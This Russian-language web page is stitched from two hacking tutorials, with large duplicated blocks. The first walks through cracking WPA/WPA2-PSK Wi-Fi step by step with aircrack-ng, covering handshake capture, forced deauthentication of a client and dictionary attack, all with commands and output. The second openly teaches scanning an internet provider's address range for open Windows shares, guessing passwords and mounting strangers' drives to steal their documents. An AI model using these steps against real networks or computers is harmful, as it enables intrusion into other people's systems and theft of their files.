Как взломать WiFi сеть... Введение
Как взломать WiFi сеть... ВведениеСтатья на этой странице, прежде всего для служебного использования администратора беспроводной сети или владельца такой беспроводной сети для выявления проблемных мест в безопасности своей инфраструктуры.
Это руководство объясняет, как взламывать сети, защищенные WPA/WPA2 с использованием Pre-Shared Key (PSK).
WPA/WPA2 поддерживает много других способов аутентификации, но aircrack-ng взламывает только PSK, так что убедитесь, что airodump-ng
показывает сеть с типом аутентификации PSK. В противном случае даже не пытайтесь в нее проникнуть.
Существует важное различие между взломом WPA/WPA2 и WEP.
Если в WEP для ускорения процесса взлома используются статистические методы, WPA можно взломать только методом прямого перебора. Это происходит из-за отсутствия постоянного ключа, поэтому сбор начальных векторов (IV) отнюдь не ускорит процесс взлома, как это было бы при атаке на WEP.
Единственный способ получить нужную информацию – начать перехват
пакетов в момент установки соединения между клиентом и AP. Установка соединения происходит в тот момент, когда клиент входит в сеть (это не совсем верно, но в контексте данного документа, будем руководствоваться этим).
Длина PSK может составлять от 8 до 63 символов, и чем она больше, тем меньше вероятность успешного взлома.
Но не все так безнадежно. В случае, если ключ является словарным словом или же
менее 8 символов, взлом возможен.
Отсюда, кстати, понятно, как создать неломаемую сеть – достаточно использовать WPA/WPA2 и ключ длиной 63 байта, состоящий из случайного набора букв, цифр и псевдосимволов.
Полный перебор – занятие не из легких. Поскольку требуются серьезные вычисления, компьютер может проверять от 50 до 300 ключей в секунду, в зависимости от мощности процессора. Перебор достаточно большого словаря может занять часы, если не дни, а если вы хотите сгенерировать свой собственный файл словаря, который включает в себя все комбинации букв, цифр и псевдосимволов, воспользуйтеськалькулятором времени перебора (http://lastbit.com/pswcalc.asp).
Например, перебор пароля
длиной 6 символов, состоящего из букв верхнего, нижнего регистров и цифр, займет 64 часа, а полный перебор уже 7-и символьного пароля – шесть месяцев.
Думаю, не стоит говорить про 29 лет на перебор 8 символов.
Различий между взломом WPA и WPA2 нет, там используется одинаковая
аутентификация, поэтому технология та же.
Условия работы
· Атакуемый клиент с WPA2:
- MAC: 00:0F:B5:FD:FB:C2
· AP:
- ESSID: teddy
- MAC: 00:14:6C:7E:40:80
- Channel: 9
· Система AirCrack-ng:
- MAC: 00:0F:B5:88:AC:82
РешениеПредисловие
Наша цель – захватить пакеты во время установления защищенного соединения и использовать aircrack-ng для взлома PSK. Это можно сделать активным и пассивным способом.
Активный заключается в посылке деаутентификационного пакета клиенту, пассивный — в ожидании, пока клиент начнет устанавливать WPA/WPA2 соединение самостоятельно.
Преимущество пассивного способа в том, что отсутствует необходимость в
инжекции, поэтому реализация атаки возможна и под Windows.
Вот наши основные шаги:
– запустить беспроводной интерфейс в режиме мониторинга на AP канале;
– запустить на этом же канале airodump-ng с фильтром по bssid;
– использовать aireplay-ng, чтобы деаутентифицировать беспроводного клиента;
– использовать aircrack-ng для взлома PSK ключа.
Шаг 1: запуск беспроводного интерфейса в режиме мониторинга
Итак, нам необходимо включить режим мониторинга. В этом режиме беспроводная
карта ловит все пакеты в эфире, вместо обычного режима, когда она «слышит» только то, что адресовано ей. Перехватывая каждый пакет, мы можем отловить момент 4-х этапной WPA/WPA2 аутентификации.
Для начала остановим ath0:
# airmon-ng stop ath0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
Убедимся, что нет других athX интерфейсов:
# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wifi0 no wireless extensions.
Если еще какие-то athX присутствуют, остановите их тоже.
Теперь установим беспроводную карту на канал 9 в режиме мониторинга:
# airmon-ng start wifi0 9
В этой команде мы используем «wifi0» вместо привычного «ath0», поскольку используем драйвера madwifi-ng. Ответом будет что-то вроде:
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
Обратите внимание на строчку monitor mode enabled. Чтобы проверить, что интерфейс правильно сконфигурирован, запустите:
# iwconfig
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Вы видите, что ath0 работает в режиме мониторинга, на частоте 2.452, что
соответствует 9 каналу, и что в AP стоит MAC-адрес вашей карты. В отличии от всех
остальных, только драйвера madwifi-ng показывают ваш адрес в поле AP.
Итак, все отлично.
Очень важным моментом является проверка всех данных перед непосредственным процессом взлома. Если что-то не так, дальнейшие шаги могут оказаться бесполезными.
Убедиться в соответствии частоты беспроводной карточки каналу можно по этому адресу:
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels.
Шаг 2: airodump-ng
Цель этого шага – отловить момент установки безопасного соединения с AP.
# airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0
-9 – это канал, на котором работает беспроводная сеть
--bssid 00:14:6C:7E:40:80 – MAC адрес AP.
Этот параметр отфильтрует "левый" трафик
-w psk – имя файла, в который мы будут записываться пойманные IV
ath0 – имя нашего беспроводного интерфейса
Важно: не используйте параметр --ivs. Вы должны захватывать пакеты целиком. Итак, в случае, если к точке присоединен клиент, на экране появится что-то вроде этого:
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy
BSSID STATION PWR Lost Packets Probes
00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116
А если клиентов в данный момент нет, то это:
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy
Уточним, что иногда для перехвата момента установки соединения приходится совершать дополнительные телодвижения. Ваша карточка должна быть в том же режиме, что AP и клиентское устройство.
Например, если ваша карточка в режиме B, а клиент – в режиме G, то отловить аутентификацию не получится.
Также, иногда бывает нужно выставить ту же скорость, например 11 Мб или 54 Мб. В общем, если не удалось перехватить установку соединение сразу, следует поэкспериментировать.
Шаг 3: используем aireplay-ng, чтобы отсоединить клиента.
Этот шаг необязателен и выполняется лишь в том случае, когда вы хотите ускорить процесс взлома. Естественно, для выполнения нижеприведенных действий необходимо, чтобы к точке был присоединен хотя бы один клиент. Если в данный момент никаких беспроводных клиентов не наблюдается, расслабьтесь и переходите сразу к следующему шагу. Конечно, если в дальнейшем беспроводной клиент появится, никто не мешает вам вернуться и выполнить все описанные ниже команды.
Итак, на данном этапе мы посылаем беспроводному клиенту сообщение о том, что он больше не ассоциирован с AP. Клиент попытается установить соединение заново и пошлет именно те пакеты, которые нам нужны.
Основываясь на полученных данных из предыдущего шага, выполним на другой консоли следующую команду:
# aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
-0 означает деаутентификацию
1 – количество деаутентификационных пакетов (можно увеличить)
-a 00:14:6C:7E:40:80 – MAC-адрес AP
-c 00:0F:B5:FD:FB:C2 – MAC-адрес отсекаемого клиента
ath0 – имя нашей беспроводной карточки.
Ответ должен быть таким:
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
Деаутентификационный пакет шлется напрямую с вашего компьютера на компьютер клиента, поэтому убедитесь, что вы находитесь достаточно близко к последнему.
Шаг 4: запускаем aircrack-ng и ломаем PSK ключ.
Цель данного шага – попытаться взломать PSK ключ путем подбора по словарю.
Небольшой словарик идет в комплекте с aircrack-ng (password.lst), более объемные словари можно легко найти в сети или сгенерировать самостоятельно при помощи известной программы John the Ripper.
Открываем новую консоль и запускаем:
# aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
-w password.lst назначает имя файла со словарем
psk*.cap назначает имя файла с перехваченными пакетами. Маска "*" используется, поскольку файл может быть не один.
В случае, если аутентификационные пакеты не найдены, вывод будет примерно следующим:
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Read 1827 packets.
No valid WPA handshakes found.
Если это произошло, попробуйте повторить третий шаг и заново выбить беспроводного клиента из сети, чтобы он повторил процедуру установления соединения. Если вы использовали пассивный метод сбора пакетов, ждите дальше, пока не появится клиент, устанавливающий соединение. Вывод в случае нахождения подходящих пакетов будет таким:
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
# BSSID ESSID Encryption
1 00:14:6C:7E:40:80 teddy WPA (1 handshake)
Choosing first network as target.
С этого момента aircrack-ng может начать взлом PSK ключа. В зависимости от скорости вашего процессора и размера словаря, этот процесс может занять часы или дни.
Успешный взлом ключа выглядит так:
Aircrack-ng 0.8
[00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
Это руководство объясняет, как взламывать сети, защищенные WPA/WPA2 с использованием Pre-Shared Key (PSK).
WPA/WPA2 поддерживает много других способов аутентификации, но aircrack-ng взламывает только PSK, так что убедитесь, что airodump-ng
показывает сеть с типом аутентификации PSK. В противном случае даже не пытайтесь в нее проникнуть.
Существует важное различие между взломом WPA/WPA2 и WEP.
Если в WEP для ускорения процесса взлома используются статистические методы, WPA можно взломать только методом прямого перебора. Это происходит из-за отсутствия постоянного ключа, поэтому сбор начальных векторов (IV) отнюдь не ускорит процесс взлома, как это было бы при атаке на WEP.
Единственный способ получить нужную информацию – начать перехват
пакетов в момент установки соединения между клиентом и AP. Установка соединения происходит в тот момент, когда клиент входит в сеть (это не совсем верно, но в контексте данного документа, будем руководствоваться этим).
Длина PSK может составлять от 8 до 63 символов, и чем она больше, тем меньше вероятность успешного взлома.
Но не все так безнадежно. В случае, если ключ является словарным словом или же
менее 8 символов, взлом возможен.
Отсюда, кстати, понятно, как создать неломаемую сеть – достаточно использовать WPA/WPA2 и ключ длиной 63 байта, состоящий из случайного набора букв, цифр и псевдосимволов.
Полный перебор – занятие не из легких. Поскольку требуются серьезные вычисления, компьютер может проверять от 50 до 300 ключей в секунду, в зависимости от мощности процессора. Перебор достаточно большого словаря может занять часы, если не дни, а если вы хотите сгенерировать свой собственный файл словаря, который включает в себя все комбинации букв, цифр и псевдосимволов, воспользуйтеськалькулятором времени перебора (http://lastbit.com/pswcalc.asp).
Например, перебор пароля
длиной 6 символов, состоящего из букв верхнего, нижнего регистров и цифр, займет 64 часа, а полный перебор уже 7-и символьного пароля – шесть месяцев.
Думаю, не стоит говорить про 29 лет на перебор 8 символов.
Различий между взломом WPA и WPA2 нет, там используется одинаковая
аутентификация, поэтому технология та же.
Условия работы
- вы используете пропатченные драйвера, умеющие делать инжекцию (http://www.aircrack-ng.org/doku.php?id=injection_test – здесь рассказано, как это проверить);
- вы достаточно близки к клиенту, чтобы отправлять и получать от него данные. Запомните, то, что вы можете получать пакеты от AP, еще не значит, что у вас есть возможность отправлять на нее данные. Мощность точки выше мощности вашей карты. Проверить возможность отправки пакетов можно по линку, указанному в пункте выше;
- вы используете aircrack-ng 0.9 stable (иначе некоторые параметры могут быть другими). Проверьте, что все условия соблюдены, иначе нижеприведенные советы вряд ли вам помогут. Также, не забудьте заменить ath0 на имя интерфейса вашей беспроводной карточки. Окружение Чтобы проверить данное руководство в домашних условиях, вам необходимо иметь две беспроводные карточки.
· Атакуемый клиент с WPA2:
- MAC: 00:0F:B5:FD:FB:C2
· AP:
- ESSID: teddy
- MAC: 00:14:6C:7E:40:80
- Channel: 9
· Система AirCrack-ng:
- MAC: 00:0F:B5:88:AC:82
РешениеПредисловие
Наша цель – захватить пакеты во время установления защищенного соединения и использовать aircrack-ng для взлома PSK. Это можно сделать активным и пассивным способом.
Активный заключается в посылке деаутентификационного пакета клиенту, пассивный — в ожидании, пока клиент начнет устанавливать WPA/WPA2 соединение самостоятельно.
Преимущество пассивного способа в том, что отсутствует необходимость в
инжекции, поэтому реализация атаки возможна и под Windows.
Вот наши основные шаги:
– запустить беспроводной интерфейс в режиме мониторинга на AP канале;
– запустить на этом же канале airodump-ng с фильтром по bssid;
– использовать aireplay-ng, чтобы деаутентифицировать беспроводного клиента;
– использовать aircrack-ng для взлома PSK ключа.
Шаг 1: запуск беспроводного интерфейса в режиме мониторинга
Итак, нам необходимо включить режим мониторинга. В этом режиме беспроводная
карта ловит все пакеты в эфире, вместо обычного режима, когда она «слышит» только то, что адресовано ей. Перехватывая каждый пакет, мы можем отловить момент 4-х этапной WPA/WPA2 аутентификации.
Для начала остановим ath0:
# airmon-ng stop ath0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
Убедимся, что нет других athX интерфейсов:
# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wifi0 no wireless extensions.
Если еще какие-то athX присутствуют, остановите их тоже.
Теперь установим беспроводную карту на канал 9 в режиме мониторинга:
# airmon-ng start wifi0 9
В этой команде мы используем «wifi0» вместо привычного «ath0», поскольку используем драйвера madwifi-ng. Ответом будет что-то вроде:
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
Обратите внимание на строчку monitor mode enabled. Чтобы проверить, что интерфейс правильно сконфигурирован, запустите:
# iwconfig
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Вы видите, что ath0 работает в режиме мониторинга, на частоте 2.452, что
соответствует 9 каналу, и что в AP стоит MAC-адрес вашей карты. В отличии от всех
остальных, только драйвера madwifi-ng показывают ваш адрес в поле AP.
Итак, все отлично.
Очень важным моментом является проверка всех данных перед непосредственным процессом взлома. Если что-то не так, дальнейшие шаги могут оказаться бесполезными.
Убедиться в соответствии частоты беспроводной карточки каналу можно по этому адресу:
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels.
Шаг 2: airodump-ng
Цель этого шага – отловить момент установки безопасного соединения с AP.
# airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0
-9 – это канал, на котором работает беспроводная сеть
--bssid 00:14:6C:7E:40:80 – MAC адрес AP.
Этот параметр отфильтрует "левый" трафик
-w psk – имя файла, в который мы будут записываться пойманные IV
ath0 – имя нашего беспроводного интерфейса
Важно: не используйте параметр --ivs. Вы должны захватывать пакеты целиком. Итак, в случае, если к точке присоединен клиент, на экране появится что-то вроде этого:
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy
BSSID STATION PWR Lost Packets Probes
00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116
А если клиентов в данный момент нет, то это:
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy
Уточним, что иногда для перехвата момента установки соединения приходится совершать дополнительные телодвижения. Ваша карточка должна быть в том же режиме, что AP и клиентское устройство.
Например, если ваша карточка в режиме B, а клиент – в режиме G, то отловить аутентификацию не получится.
Также, иногда бывает нужно выставить ту же скорость, например 11 Мб или 54 Мб. В общем, если не удалось перехватить установку соединение сразу, следует поэкспериментировать.
Шаг 3: используем aireplay-ng, чтобы отсоединить клиента.
Этот шаг необязателен и выполняется лишь в том случае, когда вы хотите ускорить процесс взлома. Естественно, для выполнения нижеприведенных действий необходимо, чтобы к точке был присоединен хотя бы один клиент. Если в данный момент никаких беспроводных клиентов не наблюдается, расслабьтесь и переходите сразу к следующему шагу. Конечно, если в дальнейшем беспроводной клиент появится, никто не мешает вам вернуться и выполнить все описанные ниже команды.
Итак, на данном этапе мы посылаем беспроводному клиенту сообщение о том, что он больше не ассоциирован с AP. Клиент попытается установить соединение заново и пошлет именно те пакеты, которые нам нужны.
Основываясь на полученных данных из предыдущего шага, выполним на другой консоли следующую команду:
# aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
-0 означает деаутентификацию
1 – количество деаутентификационных пакетов (можно увеличить)
-a 00:14:6C:7E:40:80 – MAC-адрес AP
-c 00:0F:B5:FD:FB:C2 – MAC-адрес отсекаемого клиента
ath0 – имя нашей беспроводной карточки.
Ответ должен быть таким:
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
Деаутентификационный пакет шлется напрямую с вашего компьютера на компьютер клиента, поэтому убедитесь, что вы находитесь достаточно близко к последнему.
Шаг 4: запускаем aircrack-ng и ломаем PSK ключ.
Цель данного шага – попытаться взломать PSK ключ путем подбора по словарю.
Небольшой словарик идет в комплекте с aircrack-ng (password.lst), более объемные словари можно легко найти в сети или сгенерировать самостоятельно при помощи известной программы John the Ripper.
Открываем новую консоль и запускаем:
# aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
-w password.lst назначает имя файла со словарем
psk*.cap назначает имя файла с перехваченными пакетами. Маска "*" используется, поскольку файл может быть не один.
В случае, если аутентификационные пакеты не найдены, вывод будет примерно следующим:
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Read 1827 packets.
No valid WPA handshakes found.
Если это произошло, попробуйте повторить третий шаг и заново выбить беспроводного клиента из сети, чтобы он повторил процедуру установления соединения. Если вы использовали пассивный метод сбора пакетов, ждите дальше, пока не появится клиент, устанавливающий соединение. Вывод в случае нахождения подходящих пакетов будет таким:
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
# BSSID ESSID Encryption
1 00:14:6C:7E:40:80 teddy WPA (1 handshake)
Choosing first network as target.
С этого момента aircrack-ng может начать взлом PSK ключа. В зависимости от скорости вашего процессора и размера словаря, этот процесс может занять часы или дни.
Успешный взлом ключа выглядит так:
Aircrack-ng 0.8
[00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
Взломай комп
Постараюсь объяснить как это сделать так сказать "на пальцах", насколько у меня это получится - не знаю поскольку все это постигал сам... Прежде всего мой совет:
Установите на свой компьютер Windows 2k
Скачайте и установите на свой компьютер сканер Essential Net Tools v3.0
Скачайте и установите на свой компьютер HakTek v1.1
NEW!!! IMPORTANT!!! Не забывайте включить протокол Net BEUI и Доступ к файлам и принтерам сети Мелкософт!!!
В Windows 2000 это делается только в свойствах соединения, а в 9х его еще нужно поставить в свойствах сети!
Ну, пожалуй для начала взлома удаленного компьютера этого вполне достаточно. Хотя нет, скачайте с сайта http://www.pysoft.com/ звонилку Advanced Dialer, ну этого должно хватить...
Теперь некоторые объяснения предыдущих действий:Для чего нам Windows 2k? Да очень просто - по моим наблюдениям все сканеры лучше и корректнее работают под 2000, кроме этого когда вы нашли потенциальную жертву вам нужно изменить вашу рабочую группу на группу установленную на компьютере жертвы в Windows 2000 это делается так: правая кнопка мыши на >Мой компьютер> выбираем >Сетевая идентификация >Свойства, в нижней части там где написано "Является членом:" должна стоять галочка "Рабочей группы" вы пишите нужное вам имя рабочей группы, нажимаете "ОК" и вам высвечивается приветствие "Добро пожаловать в рабочую группу такую-то", вы нажимаете кнопочку "ОК" и вам предлагается перезагрузить компьютер для вступления в силу изменений, в этот момент вы должны не нажать кнопочку "ОК", как ранее, а просто закрыть окошко, теперь вам просто нужно нажать "ОК" на "Свойствах системы" и опять вас предупредят о том что нужно перезагрузить компьютер, на что вы должны категорично ответить "НЕТ". Поздравляю - изменения вступили - таки в силу без всяких там перезагрузок. В этом еще одна изюминка Windows 2000, поскольку в системах "для домохозяек", а именно 9х, Ме изменения вступают только после перезагрузки! А это все время: время на перезагрузку, на подключение к интернет - в результате вполне возможно, что когда вы подключитесь к интернет после перезагрузки жертвы уже там не будет. Экономьте время!!!
Зачем жен нам Essential NetTools v3.0? Как было сказано выше - это сканер (более подробное описание вы сможете найти на страничке скачивания), нам же достаточно знать что он позволяет сканировать диапазон IP-адресов на расшаренные ресурсы, и выборочный адрес на шары (расшаренные, шары - ресурсы доступные пользователям рабочей группы, а следовательно и вам!), а также, что тоже немаловажно!, подбирать пароли доступа (не думайте что это такая уж быстрая процедура, но, как правило, в большинстве случаев лица с расшаренными ресурсами - это либо ломаки, либо лица чересчур самоуверенные, либо секретарши на фирмах (кстати почему бы им всем не подумать о безопасности?) у которых пароль подбирается буквально с первой - второй попытки:-))) Кроме того, она позволяет подключать эти самые шары к вашему компьютеру без головной боли (но эта процедура итак не очень утомительная). Ну вроде по этому поводу - все....
HakTek v1.1 - в принципе особой необходимости в этой программе нет, но все-равно рекомендую скачать - мне больше всего нравится Finger Session. Вобщем - читайте описание на страничке скачивания.
Зачем нам Advanced Dialer? Вроде бы простая звонилка... Но у нее есть одна хорошая черта. Вы хотите иметь пароли пользователей вашего провайдера? Тогда ставьте Advanced Dialer ибо он при подключении показывает и ваш IP-адрес и, что самое главное, IP-адрес сервера провайдера к которому вы подключены (так же как и многие другие пользователи!!!;-))) - вот это главное!
Ну, предположим, что вы выполнили все рекомендации. Теперь начнем работу на примере кражи документов с диска С компьютера подключенного к тому же провайдеру что и вы:
Подключаемся к интернет при помощи Advanced Dialer и смотрим IP-адрес сервера провайдера (как правило он никогда не изменяется, так что смело можете записывать его на бумажку), допустим 194.153.128.132 - реальный IP-адрес провайдера ZEOS
Запускаем Essential NetTools v3.0 и выбираем NBScan, там вводим начальный IP-адрес для сканирования "Starting IP adress" (в нашем случае пусть это будет например 194.153.128.0) и конечный IP-адрес "Ending IP adress" (в нашем случае это пусть будет 194.153.128.75, вообще-то конечным должен был бы быть IP 194.153.128.255, но я никогда не видел чтобы кто-то был подключен к адресу более 194.153.128.72, поэтому тратить кучу времени на сканирование еще 180 адресов по-моему просто глупо...
После того как процесс сканирования окончен мы увидим примерно следующее:
NAME WORKGROUP RS IP Adress MAC Adress
Legioner Legion666 Yes 194.153.128.15 это нас не интересует
Vovan Workgroup No 194.153.128.19 это нас не интересует Dmitriy
Venera Yes 194.153.128.21 это нас не интересует
Sinelnikov Claus Yes 194.153.128.32 это нас не интересует
Kinder Troja Yes 194.153.128.43 это нас не интересует
Sky Circus Yes 194.153.128.47 это нас не интересует
Trishka Killers No 194.153.128.64 это нас не интересует
Judge Dred No 194.153.128.69 это нас не интересует
4. Мы видим имена, рабочие группы, RS - расшаренные ресурсы, IP-адреса, адреса МАК компьютеров с NetBios Sessions (то есть с открытым 139 - м портом) Кстати не забудьте включить у себя NetBios - иначе ничего не будет, также для личной безопасности сделайте все диски и принтеры локальными (защитите их от чтения и записи). Нам нужны только: рабочая группа, RS, IP-адреса. Если RS - No - об этом компьютере можно сразу забыть. Если же -Yes, то можно попробовать подключится к нему.
Для этого:
Включаем NAT
Вводим адрес IP - например 194.153.128.15 и нажимаем "SCAN"
Теперь немного подождем...
Что мы видим:
* Checking 194.153.128.47 ...
* Obtained NetBIOS name table:
SKY
SKY
CIRCUS
SKY
CIRCUS
DAN
CIRCUS
..__MSBROWSE__.
* Trying username "ADMINISTRATOR", password "": failed - начало подбора пароля
* Trying username "ADMINISTRATOR", password "ADMINISTRATOR": failed
* Trying username "ADMINISTRATOR", password "GUEST": failed
* Trying username "ADMINISTRATOR", password "ROOT": failed
* Trying username "ADMINISTRATOR", password "ADMIN": failed
* Trying username "ADMINISTRATOR", password "PASSWORD": failed
* Trying username "ADMINISTRATOR", password "TEMP": failed
* Trying username "ADMINISTRATOR", password "SHARE": failed
* Trying username "ADMINISTRATOR", password "WRITE": failed
* Trying username "ADMINISTRATOR", password "FULL": failed
* Trying username "ADMINISTRATOR", password "BOTH": failed
* Trying username "ADMINISTRATOR", password "READ": failed
* Trying username "ADMINISTRATOR", password "FILES": failed
* Trying username "ADMINISTRATOR", password "DEMO": failed
* Trying username "ADMINISTRATOR", password "TEST": failed
* Trying username "ADMINISTRATOR", password "ACCESS": failed
* Trying username "ADMINISTRATOR", password "USER": failed
* Trying username "ADMINISTRATOR", password "BACKUP": failed
* Trying username "ADMINISTRATOR", password "SYSTEM": failed
* Trying username "ADMINISTRATOR", password "SERVER": failed
* Trying username "ADMINISTRATOR", password "LOCAL": failed
* Trying username "GUEST", password "": failed
* Trying username "GUEST", password "ADMINISTRATOR": failed
* Trying username "GUEST", password "GUEST": succeeded - пароль успешно подобран
* Obtained share list: - список возможных доступных ресурсов
IPC$ Remote IPC
E$ Default share
D$ Default share
C
ADMIN$ Remote Admin
C$ Default share
* Obtained server information:
Server=[SKY] User=[] Workgroup=[SKYGROUP] Domain=[]
* Checking share E$: access denied - доступ запрещен
* Checking share D$: access denied - доступ запрещен
* Checking share C: read-write access - доступ разрешен для чтения-записи
* Checking share ADMIN$: access denied
* Checking share C$: access denied
* Finished checking 194.153.128.47
Ну вот мы и нашли подходящую жертву! Как видно из списка, мы можем подключиться к диску С (разрешен доступ для чтения и записи), то есть мы можем записывать жертве на диск, стирать с его диска, копировать с его диска!
Теперь нам нужно подключить удаленный компьютер. В этом нет ничего сложного. Для этого нам нужно изменить рабочую группу согласно вышеописанному способу. В Essential NetTools открыть NBScan и выделить потенциальную "жертву", в нашем случае это Sky с рабочей группой Circus и IP-адресом 194.153.128.47, нажать правую кнопку мышки и выбрать в контекстном меню "Open computer". В ответ откроется стандартное окно Windows где будет присутствовать диск "С". Наводим на этот самый диск "С" нажимаем правую кнопку мыши и в контекстном меню выбираем "Подключить сетевой диск", когда главный каталог будет считан мы можем начинать "лазить", а точнее сказать "ползать" по диску "С" удаленного компьютера с адресом 194.153.128.47, делать это можно при помощи стандартного "Проводника", Windows Commander и других программ.
Установите на свой компьютер Windows 2k
Скачайте и установите на свой компьютер сканер Essential Net Tools v3.0
Скачайте и установите на свой компьютер HakTek v1.1
NEW!!! IMPORTANT!!! Не забывайте включить протокол Net BEUI и Доступ к файлам и принтерам сети Мелкософт!!!
В Windows 2000 это делается только в свойствах соединения, а в 9х его еще нужно поставить в свойствах сети!
Ну, пожалуй для начала взлома удаленного компьютера этого вполне достаточно. Хотя нет, скачайте с сайта http://www.pysoft.com/ звонилку Advanced Dialer, ну этого должно хватить...
Теперь некоторые объяснения предыдущих действий:Для чего нам Windows 2k? Да очень просто - по моим наблюдениям все сканеры лучше и корректнее работают под 2000, кроме этого когда вы нашли потенциальную жертву вам нужно изменить вашу рабочую группу на группу установленную на компьютере жертвы в Windows 2000 это делается так: правая кнопка мыши на >Мой компьютер> выбираем >Сетевая идентификация >Свойства, в нижней части там где написано "Является членом:" должна стоять галочка "Рабочей группы" вы пишите нужное вам имя рабочей группы, нажимаете "ОК" и вам высвечивается приветствие "Добро пожаловать в рабочую группу такую-то", вы нажимаете кнопочку "ОК" и вам предлагается перезагрузить компьютер для вступления в силу изменений, в этот момент вы должны не нажать кнопочку "ОК", как ранее, а просто закрыть окошко, теперь вам просто нужно нажать "ОК" на "Свойствах системы" и опять вас предупредят о том что нужно перезагрузить компьютер, на что вы должны категорично ответить "НЕТ". Поздравляю - изменения вступили - таки в силу без всяких там перезагрузок. В этом еще одна изюминка Windows 2000, поскольку в системах "для домохозяек", а именно 9х, Ме изменения вступают только после перезагрузки! А это все время: время на перезагрузку, на подключение к интернет - в результате вполне возможно, что когда вы подключитесь к интернет после перезагрузки жертвы уже там не будет. Экономьте время!!!
